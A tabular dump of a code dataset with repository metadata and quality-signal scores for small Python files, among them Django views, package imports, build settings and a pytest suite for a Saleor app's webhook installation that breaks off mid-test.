hexsha
string | size
int64 | ext
string | lang
string | max_stars_repo_path
string | max_stars_repo_name
string | max_stars_repo_head_hexsha
string | max_stars_repo_licenses
list | max_stars_count
int64 | max_stars_repo_stars_event_min_datetime
string | max_stars_repo_stars_event_max_datetime
string | max_issues_repo_path
string | max_issues_repo_name
string | max_issues_repo_head_hexsha
string | max_issues_repo_licenses
list | max_issues_count
int64 | max_issues_repo_issues_event_min_datetime
string | max_issues_repo_issues_event_max_datetime
string | max_forks_repo_path
string | max_forks_repo_name
string | max_forks_repo_head_hexsha
string | max_forks_repo_licenses
list | max_forks_count
int64 | max_forks_repo_forks_event_min_datetime
string | max_forks_repo_forks_event_max_datetime
string | content
string | avg_line_length
float64 | max_line_length
int64 | alphanum_fraction
float64 | qsc_code_num_words_quality_signal
int64 | qsc_code_num_chars_quality_signal
float64 | qsc_code_mean_word_length_quality_signal
float64 | qsc_code_frac_words_unique_quality_signal
float64 | qsc_code_frac_chars_top_2grams_quality_signal
float64 | qsc_code_frac_chars_top_3grams_quality_signal
float64 | qsc_code_frac_chars_top_4grams_quality_signal
float64 | qsc_code_frac_chars_dupe_5grams_quality_signal
float64 | qsc_code_frac_chars_dupe_6grams_quality_signal
float64 | qsc_code_frac_chars_dupe_7grams_quality_signal
float64 | qsc_code_frac_chars_dupe_8grams_quality_signal
float64 | qsc_code_frac_chars_dupe_9grams_quality_signal
float64 | qsc_code_frac_chars_dupe_10grams_quality_signal
float64 | qsc_code_frac_chars_replacement_symbols_quality_signal
float64 | qsc_code_frac_chars_digital_quality_signal
float64 | qsc_code_frac_chars_whitespace_quality_signal
float64 | qsc_code_size_file_byte_quality_signal
float64 | qsc_code_num_lines_quality_signal
float64 | qsc_code_num_chars_line_max_quality_signal
float64 | qsc_code_num_chars_line_mean_quality_signal
float64 | qsc_code_frac_chars_alphabet_quality_signal
float64 | qsc_code_frac_chars_comments_quality_signal
float64 | qsc_code_cate_xml_start_quality_signal
float64 | qsc_code_frac_lines_dupe_lines_quality_signal
float64 | qsc_code_cate_autogen_quality_signal
float64 | qsc_code_frac_lines_long_string_quality_signal
float64 | qsc_code_frac_chars_string_length_quality_signal
float64 | qsc_code_frac_chars_long_word_length_quality_signal
float64 | qsc_code_frac_lines_string_concat_quality_signal
float64 | qsc_code_cate_encoded_data_quality_signal
float64 | qsc_code_frac_chars_hex_words_quality_signal
float64 | qsc_code_frac_lines_prompt_comments_quality_signal
float64 | qsc_code_frac_lines_assert_quality_signal
float64 | qsc_codepython_cate_ast_quality_signal
float64 | qsc_codepython_frac_lines_func_ratio_quality_signal
float64 | qsc_codepython_cate_var_zero_quality_signal
bool | qsc_codepython_frac_lines_pass_quality_signal
float64 | qsc_codepython_frac_lines_import_quality_signal
float64 | qsc_codepython_frac_lines_simplefunc_quality_signal
float64 | qsc_codepython_score_lines_no_logic_quality_signal
float64 | qsc_codepython_frac_lines_print_quality_signal
float64 | qsc_code_num_words
int64 | qsc_code_num_chars
int64 | qsc_code_mean_word_length
int64 | qsc_code_frac_words_unique
null | qsc_code_frac_chars_top_2grams
int64 | qsc_code_frac_chars_top_3grams
int64 | qsc_code_frac_chars_top_4grams
int64 | qsc_code_frac_chars_dupe_5grams
int64 | qsc_code_frac_chars_dupe_6grams
int64 | qsc_code_frac_chars_dupe_7grams
int64 | qsc_code_frac_chars_dupe_8grams
int64 | qsc_code_frac_chars_dupe_9grams
int64 | qsc_code_frac_chars_dupe_10grams
int64 | qsc_code_frac_chars_replacement_symbols
int64 | qsc_code_frac_chars_digital
int64 | qsc_code_frac_chars_whitespace
int64 | qsc_code_size_file_byte
int64 | qsc_code_num_lines
int64 | qsc_code_num_chars_line_max
int64 | qsc_code_num_chars_line_mean
int64 | qsc_code_frac_chars_alphabet
int64 | qsc_code_frac_chars_comments
int64 | qsc_code_cate_xml_start
int64 | qsc_code_frac_lines_dupe_lines
int64 | qsc_code_cate_autogen
int64 | qsc_code_frac_lines_long_string
int64 | qsc_code_frac_chars_string_length
int64 | qsc_code_frac_chars_long_word_length
int64 | qsc_code_frac_lines_string_concat
null | qsc_code_cate_encoded_data
int64 | qsc_code_frac_chars_hex_words
int64 | qsc_code_frac_lines_prompt_comments
int64 | qsc_code_frac_lines_assert
int64 | qsc_codepython_cate_ast
int64 | qsc_codepython_frac_lines_func_ratio
int64 | qsc_codepython_cate_var_zero
int64 | qsc_codepython_frac_lines_pass
int64 | qsc_codepython_frac_lines_import
int64 | qsc_codepython_frac_lines_simplefunc
int64 | qsc_codepython_score_lines_no_logic
int64 | qsc_codepython_frac_lines_print
int64 | effective
string | hits
int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
3989fcd5de8c4c51a7c93a3d15219892f8a04f09
| 91
|
py
|
Python
|
algo/test/test_hyperloglog.py
|
ssavinash1/Algorithm_stanford
|
f2588b6bcac2b0858e78b819e6e8402109e80ee2
|
[
"MIT"
] | 24
|
2016-03-21T07:53:54.000Z
|
2020-06-29T12:16:36.000Z
|
algo/test/test_hyperloglog.py
|
ssavinash1/Algorithm_stanford
|
f2588b6bcac2b0858e78b819e6e8402109e80ee2
|
[
"MIT"
] | 5
|
2015-09-29T17:12:36.000Z
|
2020-03-26T20:51:56.000Z
|
algo/test/test_hyperloglog.py
|
ssavinash1/Algorithm_stanford
|
f2588b6bcac2b0858e78b819e6e8402109e80ee2
|
[
"MIT"
] | 12
|
2016-05-24T16:48:32.000Z
|
2020-10-02T12:22:09.000Z
|
import unittest
import src.hyperloglog
class TestHyperLogLog(unittest.TestCase):
pass
| 11.375
| 41
| 0.813187
| 10
| 91
| 7.4
| 0.8
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.131868
| 91
| 7
| 42
| 13
| 0.936709
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.25
| 0.5
| 0
| 0.75
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 1
| 0
|
0
| 6
|
3996a58e95138024b00193634b92d34711f89c54
| 113
|
py
|
Python
|
judger/uoj_judger/tests/coin2/gen.py
|
contropist/uoj
|
114ebf690dcfb22ec899cbdc3d3cb77a30b46285
|
[
"MIT"
] | null | null | null |
judger/uoj_judger/tests/coin2/gen.py
|
contropist/uoj
|
114ebf690dcfb22ec899cbdc3d3cb77a30b46285
|
[
"MIT"
] | null | null | null |
judger/uoj_judger/tests/coin2/gen.py
|
contropist/uoj
|
114ebf690dcfb22ec899cbdc3d3cb77a30b46285
|
[
"MIT"
] | null | null | null |
print(14514)
for i in range(3, 121):
for j in range(1, i + 1):
print(i, j, -1)
print(i, j, 1)
| 22.6
| 29
| 0.486726
| 23
| 113
| 2.391304
| 0.434783
| 0.254545
| 0.254545
| 0.290909
| 0.309091
| 0
| 0
| 0
| 0
| 0
| 0
| 0.173333
| 0.336283
| 113
| 5
| 30
| 22.6
| 0.56
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0.6
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
|
0
| 6
|
39b592e2d51f4a0cd0c91f41868e1ba7aceb4c49
| 158
|
py
|
Python
|
src/extra_links/admin.py
|
MetricsGroup/IERT-Webapp
|
9e43f1775767412898f9340b9cc84196eb4abfdb
|
[
"MIT"
] | 3
|
2019-04-25T11:19:22.000Z
|
2020-05-10T20:41:12.000Z
|
src/extra_links/admin.py
|
MetricsGroup/IERT-Webapp
|
9e43f1775767412898f9340b9cc84196eb4abfdb
|
[
"MIT"
] | 5
|
2020-06-17T05:16:27.000Z
|
2022-01-13T02:15:56.000Z
|
src/extra_links/admin.py
|
MetricsGroup/IERT-Webapp
|
9e43f1775767412898f9340b9cc84196eb4abfdb
|
[
"MIT"
] | 3
|
2020-06-13T10:40:27.000Z
|
2021-10-13T15:45:50.000Z
|
from django.contrib import admin
from .models import notice_board
from home.models import popup
admin.site.register(notice_board)
admin.site.register(popup)
| 22.571429
| 33
| 0.835443
| 24
| 158
| 5.416667
| 0.5
| 0.184615
| 0.261538
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.094937
| 158
| 6
| 34
| 26.333333
| 0.909091
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.6
| 0
| 0.6
| 0
| 1
| 0
| 0
| null | 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
39e7efe8cad9d1a50ee5fbb054ca8e477250719d
| 73
|
py
|
Python
|
h2o-docs/src/booklets/v2_2015/source/Python_Vignette_code_examples/python_show_column_types.py
|
ahmedengu/h2o-3
|
ac2c0a6fbe7f8e18078278bf8a7d3483d41aca11
|
[
"Apache-2.0"
] | 6,098
|
2015-05-22T02:46:12.000Z
|
2022-03-31T16:54:51.000Z
|
h2o-docs/src/booklets/v2_2015/source/Python_Vignette_code_examples/python_show_column_types.py
|
ahmedengu/h2o-3
|
ac2c0a6fbe7f8e18078278bf8a7d3483d41aca11
|
[
"Apache-2.0"
] | 2,517
|
2015-05-23T02:10:54.000Z
|
2022-03-30T17:03:39.000Z
|
h2o-docs/src/booklets/v2_2015/source/Python_Vignette_code_examples/python_show_column_types.py
|
ahmedengu/h2o-3
|
ac2c0a6fbe7f8e18078278bf8a7d3483d41aca11
|
[
"Apache-2.0"
] | 2,199
|
2015-05-22T04:09:55.000Z
|
2022-03-28T22:20:45.000Z
|
df12.types
# {u'A': u'enum', u'C': u'real', u'B': u'enum', u'D': u'real'}
| 36.5
| 62
| 0.506849
| 18
| 73
| 2.055556
| 0.5
| 0.27027
| 0.324324
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.03125
| 0.123288
| 73
| 2
| 62
| 36.5
| 0.546875
| 0.821918
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
f2f786539d26f4fc212ffe1f6ef77dd8ff3f5b9f
| 178
|
py
|
Python
|
pypro/base/views.py
|
marciohiroyuki/django-course
|
f7a0b878a732cbfec7418f3e7522b6d0bf5d6223
|
[
"Apache-2.0"
] | null | null | null |
pypro/base/views.py
|
marciohiroyuki/django-course
|
f7a0b878a732cbfec7418f3e7522b6d0bf5d6223
|
[
"Apache-2.0"
] | 932
|
2020-04-11T08:36:27.000Z
|
2022-03-28T23:17:29.000Z
|
pypro/base/views.py
|
marciohiroyuki/django-course
|
f7a0b878a732cbfec7418f3e7522b6d0bf5d6223
|
[
"Apache-2.0"
] | null | null | null |
from django.http import HttpResponse
# Create your views here.
def home(request):
return HttpResponse('<html><body>Hello Django!</body></html>', content_type='text/html')
| 22.25
| 92
| 0.730337
| 24
| 178
| 5.375
| 0.791667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.123596
| 178
| 7
| 93
| 25.428571
| 0.826923
| 0.129213
| 0
| 0
| 0
| 0
| 0.313725
| 0.137255
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0
| 0.333333
| 0.333333
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 0
|
0
| 6
|
ffda6969848665f742abf864a92b2917873ecc05
| 39
|
py
|
Python
|
remote_gource/sources/bitbucket/__init__.py
|
wraithy/gource-summary
|
33f6946f7a19d7b26f9291a72816557dad37882a
|
[
"MIT"
] | null | null | null |
remote_gource/sources/bitbucket/__init__.py
|
wraithy/gource-summary
|
33f6946f7a19d7b26f9291a72816557dad37882a
|
[
"MIT"
] | null | null | null |
remote_gource/sources/bitbucket/__init__.py
|
wraithy/gource-summary
|
33f6946f7a19d7b26f9291a72816557dad37882a
|
[
"MIT"
] | null | null | null |
from .bitbucket import BitbucketSource
| 19.5
| 38
| 0.871795
| 4
| 39
| 8.5
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.102564
| 39
| 1
| 39
| 39
| 0.971429
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
fff979ac7dd6a9c9544e42b8056e860e01af92d0
| 225
|
py
|
Python
|
tester/__init__.py
|
ultravideo/uvgVenctester
|
73c4087efe5f654464f20c8861f0811cd62b6727
|
[
"BSD-2-Clause"
] | 7
|
2021-06-16T14:53:14.000Z
|
2022-02-24T11:42:39.000Z
|
tester/__init__.py
|
ultravideo/uvgVenctester
|
73c4087efe5f654464f20c8861f0811cd62b6727
|
[
"BSD-2-Clause"
] | null | null | null |
tester/__init__.py
|
ultravideo/uvgVenctester
|
73c4087efe5f654464f20c8861f0811cd62b6727
|
[
"BSD-2-Clause"
] | null | null | null |
from tester.core.log import console_log
from tester.core.tester import Tester, Test, Cfg, ResultTypes
from tester.encoders.base import QualityParam
from tester.core.test import EncodingRun
from tester.core import table, csv
| 32.142857
| 61
| 0.831111
| 34
| 225
| 5.470588
| 0.441176
| 0.268817
| 0.301075
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.111111
| 225
| 6
| 62
| 37.5
| 0.93
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
f29256fce8d7b1d8aad07fc9ef776531c8327296
| 34
|
py
|
Python
|
sphinx/source/blueprint_parser.py
|
spigelli/ue-blueprint-docs
|
105ab6e3afb04546ee1f9dde8bf01d4342517f04
|
[
"MIT"
] | null | null | null |
sphinx/source/blueprint_parser.py
|
spigelli/ue-blueprint-docs
|
105ab6e3afb04546ee1f9dde8bf01d4342517f04
|
[
"MIT"
] | null | null | null |
sphinx/source/blueprint_parser.py
|
spigelli/ue-blueprint-docs
|
105ab6e3afb04546ee1f9dde8bf01d4342517f04
|
[
"MIT"
] | 1
|
2022-02-23T04:56:37.000Z
|
2022-02-23T04:56:37.000Z
|
from sphinx.parser import Parser
| 11.333333
| 32
| 0.823529
| 5
| 34
| 5.6
| 0.8
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.147059
| 34
| 2
| 33
| 17
| 0.965517
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
f2aebb6c90d158c7874e0e01fa105dabd0e19c53
| 147
|
py
|
Python
|
shuttle_cock/shuttlecock/doctype/court_booking/test_court_booking.py
|
surajitmetya/Shuttle
|
2a4f71e412ec8317d34484a65fdd21c5f0756d2a
|
[
"MIT"
] | null | null | null |
shuttle_cock/shuttlecock/doctype/court_booking/test_court_booking.py
|
surajitmetya/Shuttle
|
2a4f71e412ec8317d34484a65fdd21c5f0756d2a
|
[
"MIT"
] | null | null | null |
shuttle_cock/shuttlecock/doctype/court_booking/test_court_booking.py
|
surajitmetya/Shuttle
|
2a4f71e412ec8317d34484a65fdd21c5f0756d2a
|
[
"MIT"
] | null | null | null |
# Copyright (c) 2021, Aerele and Contributors
# See license.txt
# import frappe
import unittest
class TestCourtBooking(unittest.TestCase):
pass
| 16.333333
| 45
| 0.782313
| 18
| 147
| 6.388889
| 0.888889
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.031746
| 0.142857
| 147
| 8
| 46
| 18.375
| 0.880952
| 0.496599
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.333333
| 0.333333
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 1
| 0
|
0
| 6
|
4b48aa39251126055e0f64f53bbecbaa4abc8cf8
| 20
|
py
|
Python
|
src/setup.py
|
FOFOkaboom/backup-gizmo
|
16db6cdd5fe266ef19239f8c448106ae40b70ba3
|
[
"MIT"
] | null | null | null |
src/setup.py
|
FOFOkaboom/backup-gizmo
|
16db6cdd5fe266ef19239f8c448106ae40b70ba3
|
[
"MIT"
] | null | null | null |
src/setup.py
|
FOFOkaboom/backup-gizmo
|
16db6cdd5fe266ef19239f8c448106ae40b70ba3
|
[
"MIT"
] | null | null | null |
#TODO Write setup.py
| 20
| 20
| 0.8
| 4
| 20
| 4
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.1
| 20
| 1
| 20
| 20
| 0.888889
| 0.95
| 0
| null | 0
| null | 0
| 0
| null | 0
| 0
| 1
| null | 1
| null | true
| 0
| 0
| null | null | null | 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
4b62670f4f4d89bc34715767a631d4fa669ed188
| 35
|
py
|
Python
|
external/fv3fit/fv3fit/emulation/compositions/__init__.py
|
ai2cm/fv3net
|
e62038aee0a97d6207e66baabd8938467838cf51
|
[
"MIT"
] | 1
|
2021-12-14T23:43:35.000Z
|
2021-12-14T23:43:35.000Z
|
external/fv3fit/fv3fit/emulation/compositions/__init__.py
|
ai2cm/fv3net
|
e62038aee0a97d6207e66baabd8938467838cf51
|
[
"MIT"
] | 195
|
2021-09-16T05:47:18.000Z
|
2022-03-31T22:03:15.000Z
|
external/fv3fit/fv3fit/emulation/compositions/__init__.py
|
ai2cm/fv3net
|
e62038aee0a97d6207e66baabd8938467838cf51
|
[
"MIT"
] | null | null | null |
from .blended import blended_model
| 17.5
| 34
| 0.857143
| 5
| 35
| 5.8
| 0.8
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.114286
| 35
| 1
| 35
| 35
| 0.935484
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
4bc64c83cb67b748c8356c55f47d67b161788b67
| 465
|
py
|
Python
|
igem_tuebingen_website/handlers/errors.py
|
blue1stone/igem_tuebingen_website
|
f0fee8d1d92459b17892fbeed1cab8fbc714316f
|
[
"MIT"
] | null | null | null |
igem_tuebingen_website/handlers/errors.py
|
blue1stone/igem_tuebingen_website
|
f0fee8d1d92459b17892fbeed1cab8fbc714316f
|
[
"MIT"
] | null | null | null |
igem_tuebingen_website/handlers/errors.py
|
blue1stone/igem_tuebingen_website
|
f0fee8d1d92459b17892fbeed1cab8fbc714316f
|
[
"MIT"
] | null | null | null |
from flask import render_template
from ..app import app
@app.errorhandler(404)
def page_not_found(error):
return render_template('errors/404.html'), 404
@app.errorhandler(500)
def internal_error(error):
return render_template('errors/500.html'), 500
@app.errorhandler(403)
def access_forbidden(error):
return render_template('errors/403.html'), 403
@app.errorhandler(410)
def page_gone(error):
return render_template('errors/410.html'), 410
| 20.217391
| 50
| 0.754839
| 66
| 465
| 5.166667
| 0.348485
| 0.205279
| 0.199413
| 0.293255
| 0.363636
| 0
| 0
| 0
| 0
| 0
| 0
| 0.08802
| 0.12043
| 465
| 22
| 51
| 21.136364
| 0.745721
| 0
| 0
| 0
| 0
| 0
| 0.129032
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.285714
| false
| 0
| 0.142857
| 0.285714
| 0.714286
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 6
|
29a05a6b53c62231bbf4815417a3c07cc1288ea7
| 34
|
py
|
Python
|
Guinea/util/__init__.py
|
gavindsouza/Guinea
|
88028dd71c08d37a4aa3893e75503ffe61f81b64
|
[
"Apache-2.0"
] | null | null | null |
Guinea/util/__init__.py
|
gavindsouza/Guinea
|
88028dd71c08d37a4aa3893e75503ffe61f81b64
|
[
"Apache-2.0"
] | null | null | null |
Guinea/util/__init__.py
|
gavindsouza/Guinea
|
88028dd71c08d37a4aa3893e75503ffe61f81b64
|
[
"Apache-2.0"
] | 4
|
2019-01-09T04:10:17.000Z
|
2022-02-17T10:31:28.000Z
|
from Guinea.util.sniffer import *
| 17
| 33
| 0.794118
| 5
| 34
| 5.4
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.117647
| 34
| 1
| 34
| 34
| 0.9
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
29a435cdef935704180b622295d12731c39c8df9
| 170
|
py
|
Python
|
build.py
|
cloudkick/ck-agent
|
cc9c35818742ad7fc45841ceb563ee578cdea6c8
|
[
"Apache-2.0"
] | 1
|
2020-04-23T01:03:59.000Z
|
2020-04-23T01:03:59.000Z
|
build.py
|
cloudkick/ck-agent
|
cc9c35818742ad7fc45841ceb563ee578cdea6c8
|
[
"Apache-2.0"
] | null | null | null |
build.py
|
cloudkick/ck-agent
|
cc9c35818742ad7fc45841ceb563ee578cdea6c8
|
[
"Apache-2.0"
] | null | null | null |
bootstrap_url="http://agent-resources.cloudkick.com/"
s3_bucket="s3://agent-resources.cloudkick.com"
pubkey="etc/agent-linux.public.key"
branding_name="cloudkick-agent"
| 28.333333
| 53
| 0.794118
| 24
| 170
| 5.5
| 0.666667
| 0.212121
| 0.348485
| 0.393939
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.012121
| 0.029412
| 170
| 5
| 54
| 34
| 0.787879
| 0
| 0
| 0
| 0
| 0
| 0.658824
| 0.352941
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
29d6f0fc180402486eb0258f8bab27dbf019c736
| 5,432
|
py
|
Python
|
src/saleor_app/tests/test_install.py
|
przlada/saleor-app-framework-python
|
3a561c93bf586b4210e7b3c4d2db3408046a9599
|
[
"BSD-3-Clause"
] | 20
|
2021-05-18T18:05:25.000Z
|
2022-03-02T00:39:15.000Z
|
src/saleor_app/tests/test_install.py
|
przlada/saleor-app-framework-python
|
3a561c93bf586b4210e7b3c4d2db3408046a9599
|
[
"BSD-3-Clause"
] | 13
|
2021-10-19T19:05:24.000Z
|
2022-03-22T13:17:55.000Z
|
src/saleor_app/tests/test_install.py
|
przlada/saleor-app-framework-python
|
3a561c93bf586b4210e7b3c4d2db3408046a9599
|
[
"BSD-3-Clause"
] | 11
|
2021-06-09T21:24:56.000Z
|
2022-03-12T17:33:30.000Z
|
from unittest.mock import AsyncMock, MagicMock
import pytest
from saleor_app.conf import get_settings
from saleor_app.errors import InstallAppError
from saleor_app.graphql import GraphQLError
from saleor_app.install import CREATE_WEBHOOK, install_app
from saleor_app.schemas.core import WebhookData
@pytest.mark.asyncio
async def test_install_app(monkeypatch):
saleor_webhook_id = "V2ViaG9vazoz"
json_response = {
"data": {"webhookCreate": {"errors": [], "webhook": {"id": saleor_webhook_id}}}
}
settings = get_settings()
response = MagicMock()
response.__getitem__.side_effect = json_response.__getitem__
response.get.side_effect = json_response.get
errors = None
mocked_executor = AsyncMock(return_value=(response, errors))
monkeypatch.setattr(
"saleor_app.install.get_executor", lambda host, auth_token: mocked_executor
)
monkeypatch.setattr("saleor_app.install.secrets.choice", lambda _: "a")
save_app_data_fun = AsyncMock()
events = ["ORDER_CREATED", "PRODUCT_CREATED"]
target_url = "saleor.io/app/webhook-url"
saleor_store_domain = "saleor.io"
saleor_app_token = "saleor-token"
await install_app(
domain=saleor_store_domain,
token=saleor_app_token,
events=events,
target_url=target_url,
save_app_data=save_app_data_fun,
)
expected_secret_key = "a" * 20
variables = {
"input": {
"targetUrl": target_url,
"events": [event.upper() for event in events],
"name": settings.app_name,
"secretKey": expected_secret_key,
}
}
mocked_executor.assert_awaited_once_with(CREATE_WEBHOOK, variables=variables)
save_app_data_fun.assert_awaited_once_with(
saleor_store_domain,
WebhookData(
token=saleor_app_token,
webhook_id=saleor_webhook_id,
webhook_secret_key=expected_secret_key,
),
)
@pytest.mark.asyncio
async def test_install_app_graphql_error(monkeypatch):
json_failed_response = {
"errors": [
{
"message": "You do not have permission to perform this action",
}
]
}
settings = get_settings()
response = MagicMock()
response.__getitem__.side_effect = json_failed_response.__getitem__
response.get.side_effect = json_failed_response.get
errors = [
{
"message": "You do not have permission to perform this action",
}
]
mocked_executor = AsyncMock(return_value=(response, errors))
monkeypatch.setattr(
"saleor_app.install.get_executor", lambda host, auth_token: mocked_executor
)
monkeypatch.setattr("saleor_app.install.secrets.choice", lambda _: "a")
save_app_data_fun = AsyncMock()
events = ["ORDER_CREATED", "PRODUCT_CREATED"]
target_url = "saleor.io/app/webhook-url"
saleor_store_domain = "saleor.io"
saleor_app_token = "saleor-token"
with pytest.raises(GraphQLError):
await install_app(
domain=saleor_store_domain,
token=saleor_app_token,
events=events,
target_url=target_url,
save_app_data=save_app_data_fun,
)
expected_secret_key = "a" * 20
variables = {
"input": {
"targetUrl": target_url,
"events": [event.upper() for event in events],
"name": settings.app_name,
"secretKey": expected_secret_key,
}
}
mocked_executor.assert_awaited_once_with(CREATE_WEBHOOK, variables=variables)
assert not save_app_data_fun.called
@pytest.mark.asyncio
async def test_install_app_mutation_error(monkeypatch):
json_failed_response = {
"data": {
"webhookCreate": {
"errors": [
{
"field": None,
"message": "Missing token or app",
"code": "INVALID",
}
],
"webhook": None,
}
}
